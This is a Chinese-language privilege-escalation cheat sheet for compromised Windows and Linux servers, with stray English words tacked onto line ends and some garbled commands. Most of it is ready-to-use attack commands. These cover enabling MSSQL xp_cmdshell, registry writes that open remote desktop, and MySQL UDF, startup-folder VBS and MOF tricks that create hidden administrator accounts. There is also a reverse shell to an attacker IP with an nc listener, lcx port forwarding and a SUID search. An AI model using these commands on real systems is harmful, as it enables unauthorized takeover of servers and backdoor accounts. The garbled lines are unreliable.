溢出提權php
主要是經過Windows漏洞利用來獲取系統權限mysql
常見的溢出提權web
巴西烤肉sql
prshell
步驟:數據庫
一、經過信息蒐集查看服務器打了哪些補丁windows
二、根據未打的補丁漏洞進行利用便可安全
破解hash提權服務器
上傳pwdump.exe遠程獲取hash值ide
拿到lc5彩虹表破解
便可獲得管理員密碼
須要管理員權限方可執行讀取hash操做
啓動項提權
前提寫入的目錄須要寫入權限
將批處理文件上傳到開機啓動項目錄等待管理員重啓便可
數據庫提權
SQLserver數據庫提權
mysql數據庫提權
須要具有數據庫管理員權限才能夠執行提權操做
msSQL提權
安裝組件
開啓3389
建立用戶
提高權限
完成
sa帳號的獲取,查看config.asp、conn.asp等文件
msSQL安裝執行命令組件
安裝cmd_shell組件
exec sp_configure ‘show advanced options’, 1
go
reconfigure
go
exec sp_configure ‘xp_cmdshell’, 1
go
reconfigure
go
3389操做語句
開啓3389
exec
master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEM\CurrentControlSet\Control\Terminal server’,’fDenyTSConnections’,’REG_DWORD’,0;--
關閉3389
exec
master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEM\CurrentControlSet\Control\Terminal server’,’fDenyTSConnections’,’REG_DWORD’,1;--
刪除cmd_shell組件
exec sp_configure ‘show advancer options’, 1
go
reconfigure
go
exec sp_configure xp_cmdshell; 0
go
reconfigure
go
mysql數據庫提權
udf提權
啓動項提權
maf提權
反鏈端口提權
udf提權
獲取到對方的mysql數據庫下的root帳號密碼
一、查看網站源碼裏面數據庫配置文件
(inc、conn、config.sql、common、data等)
二、查看數據庫安裝路徑下的user.myd(/data/mysql)
三、暴力破解mysql密碼,破解3306端口入侵
udf提權原理
經過root權限導出udf.dll到系統目錄下,能夠經過udf.dll調用執行cmd
c:\winnt\udf.dll 2000
c:\windows\udf.dll 2003
如今基本上win的服務器就這兩個導出udf.dll
5.1以上版本須要導出到mysql安裝目錄lib\plugin\
create function cmdshell returns string soname ‘udf.dll’
select cmdshell (‘net user abc abc /add’);
select cmdshell (‘net localgroup administrators abc /add’);
drop function cmdshell; 刪除函數
啓動項提權
一、查看咱們進入數據庫中有什麼數據表
mysql>show tables;
默認狀況下,test中沒有任何表的存在
如下爲關鍵部分
二、在TEST數據庫下建立一個新的表
mysql>create table a (cmd text);
此時建立了一個新表,表名爲a,表中只存放一個字段名爲cmd的text文件
三、在表中插入內容
mysql>insert into a values (「set wshshell=createobject(「」wscript.shell」」)」)
mysql>insert into a values (「a=wshshell.run (「」cmd.exe /c net user 1 1 /add」」,0)」);
mysql>insert into a values (「b=wshshell.ru (「」cmd.exe /c net localgroup administrators 1 /add」,0)」);
注意,雙引號和括號以及後面的「0」必定要輸入,用這三條命令來創建一個VBS的腳本程序。
四、mysql>select * from a;
此時表中有三行數據,就是前面的VBS的腳本程序
五、輸出表爲一個VBS的腳本文件
mysql>select * from a into outfile 「c://document//administrator//[開始]菜單//程序//啓動//a.vbs」;
六、重啓
mof提權
第一種方法:
上傳mof.php
輸入相關信息,執行命令,提權
第二種方法:
上傳x.mof
使用select命令導出到正確位置
select load_file(‘c:/wmpub/nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’
容許外部地址使用root用戶鏈接的SQL語句
grant all privileges on *.* to ‘root’@’%’ identified by ‘root’ with grant option;
反鏈端口提權
利用mysql客戶端工具鏈接mysql服務器,而後執行如下操做
一、執行命令
mysql.exe –h 172.16.10.11 –uroot –p
enter password:
mysql>\.c」\mysql.txt
mysql>select backshell(「yourip」,2010);
二、本地監聽反彈的端口
nc.exe –vv –l –p 2010
成功後,會得到一個system權限的cmdshell
內網端口轉發
內網主機輸入命令
lcx.exe –slave 外網ip 外網端口 內網ip 內網端口
lcx.exe –slave 200.1.1.1 1111 192.168.1.2 3389
外網主機輸入命令
lcx.exe –listen 111 1311
開啓3389
使用
批處理文件開3389
使用sql語句開3389
使用exe開3389
使用vb開3389
一些命令的利用
type E:\wwwroot\web.config 查看文件內容
cacls命令
/T:更改當前目錄及其有子目錄中指定的acl
/E:編輯acl而不替換
/C:在出現拒絕訪問錯誤的時候繼續
/G Userver:perm:賦了指定用戶訪問權限,perm表明不一樣級別的訪問權限,其值能夠是R(讀),W(寫),C(該),F(安全控制)等
/R user:撤銷指定用戶的訪問權限,注意該參數僅在與「/E」一塊兒使用的時候有效
要修改一個文件的權限必要條件
要有USERS組的徹底控制權限
cmd權限
Linux提權
內核溢出提權
mysql ndf提權
利用SUID提權
利用環境變量,劫持該勸的程序提權
內核溢出提權
查看內核
uname –r
反彈shell執行命令
上傳exp
編譯
執行
根據內核版本查找對應的漏洞
收集exp
能夠從www.exploit-db.com查找漏洞利用
mysql udf提權
上傳庫文件
執行庫文件建立命令執行函數
利用SUID提權
尋找系統裏能夠用的SUID文件來提權
$find /-perm –u=s –type f 2>/dev/null